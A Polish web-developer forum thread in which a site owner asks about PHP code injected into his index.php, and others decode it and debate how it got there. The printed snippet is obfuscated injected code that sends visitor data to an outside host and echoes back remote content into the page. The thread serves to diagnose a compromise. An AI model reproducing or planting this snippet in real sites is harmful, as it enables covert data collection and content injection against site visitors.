Podejrzenie włamania na serwer, Proszę o szybką pomoc Opcje

[Barcelona]

Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

[PHP] pobierz, plaintext 
<?php    
 
    // This code use for global bot statistic
 
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
 
    $stCurlHandle = NULL;
 
    $stCurlLink = "";
 
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
 
    {
 
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
 
        $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
 
            $stCurlHandle = curl_init( $stCurlLink ); 
 
    }
 
    } 
 
if ( $stCurlHandle !== NULL )
 
{
 
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
 
    $sResult = @curl_exec($stCurlHandle); 
 
    if ($sResult[0]=="O") 
 
     {$sResult[0]=" ";
 
      echo $sResult; // Statistic code end
 
      }
 
    curl_close($stCurlHandle); 
 
}
 
?>
[PHP] pobierz, plaintext 

Co to jest? Proszę o pomoc.

[tabbi]

Ktoś zbiera dane na temat twojej strony i wysyła do siebie - Bots vs Browsers ;]

proponuje wywołać sobie tę metodę:

[PHP] pobierz, plaintext 
echo base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==');
[PHP] pobierz, plaintext 

[Barcelona]

Tutaj zostaje wysłane, ale jakim cudem ten kod znalazł się na mojej stronie ?

[PHP] pobierz, plaintext 
<a href="http://rebotstat.com/botstat/stat.php" target="_blank">http://rebotstat.com/botstat/stat.php</a>
[PHP] pobierz, plaintext 

Ten post edytował Barcelona 28.09.2011, 00:06:58

[tabbi]

Odpowiedzi na to pytanie może być wiele,

zaczynając od typowego włamania na serwer, kończąc na udostępnieniu hasła ...

[Barcelona]

Nikomu nie udostępniałem hasła, znam go tylko ja i loguje się na serwer tylko i wyłącznie z mojego komputera.

[Damonsson]

Total Commander? ;>

[Barcelona]

Już dawno nie, WinSCP

[konrados]

Total Commander?

A właściwie to o co chodzi z tym Total Commanderem, przecież ktoś musiałby się włamać na mój komp, lub wirusa bym sobie musiał ściągnąć, by ktoś pobrał hasła, prawda?

A jeśli ktoś lubi sobie ściągać wirusy, to równie dobrze może sobie zainstalować key loggera i tym samym wpisywanie hasła za każdym razem (a niezapamiętywanie ich) niewiele pomoże.

Chyba, że czegoś nie wiem?

[pienso]

Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.

[konrados]

Jak będziesz wiedział to daj znać gdzie była luka i jak się zabezpieczać. Przyda się innym.

To była złościwość? Ja naprawdę chcę się dowiedzieć o co chodzi z tymi wszystkimi ostrzeżeniami dot. Total Commandera.

[drozdii07]

Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają

[konrados]

Jeśli zapamiętujesz hasło w TC, to później wirusy je łatwo wyciągają

Ja to wiem, ale wpierw trzeba mieć wirusa. A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.

[Fifi209]

A jeśli ktoś pozwala sobie na ściąganie wirusów, to również pozwala sobie na ściąganie key loggerów.

Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.

[Korab]

To może przeskanuj sobie komputer dwoma programami antywirusowymi.

[konrados]

Po pierwsze, nie musisz sobie ściągać wirusa jak to określiłeś, wystarczy że przyjdzie kumpel z zarażonym pendrive o czym sam nawet nie będzie wiedział.

Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.

[92nasti]

Ale mi ciągle chodzi o to, że jeśli ktoś pozwala sobie na ściągnięcie wirusa, to również może sobie pozwolić na ściągnięcie key loggera (progrram, który obserwuje wstukiwane klawisze i je wysyła na dany serwer). Więc zabezpieczenie w rodzaju "nie zapamiętuj haseł w danym programie" jest nic nie warte.

Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.

[konrados]

Błyszczysz wiedzą, w sumie to za chwile dojdzie do tego że najlepiej obsługiwać serwer na linuksie z dobrze skonfigurowanym iptables.

ehh poddaję się, chciałem się czegoś dowiedzieć i nie wyszło. Wątek raczej do zamknięcia.

[Barcelona]

Uuuu troche mnie nie było i widzę że wątek nabrał rumieńców

Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.
Ale i tak zastanawiają mnie dwie sprawy. Jakim prawem mogą ingerować własnym kodem w skrypcie, a po drugie te statystyki były zbierane przez stat.pl, a tutaj w tym kodzie przez jakiegoś rebotstat.

Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.

Chwilowo sprawa przycichła, ale muszę na bieżąco sprawdzać indexy, żeby sprawa się więcej nie powtórzyła.

A czy zakodowanie kodu strony coś pomoże ?

[by_ikar]

Kod

Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.

Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..

Co do samej strony, sprawdź formularze, może są dziurawe w efekcie ktoś ci xss zrobił na stronie.

[Barcelona]

Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..

Racja, nie pomyślałem o tym.

Sprawdzałem pliki i nie zauważyłem nic podejrzanego.

Ten post edytował Barcelona 4.10.2011, 11:39:21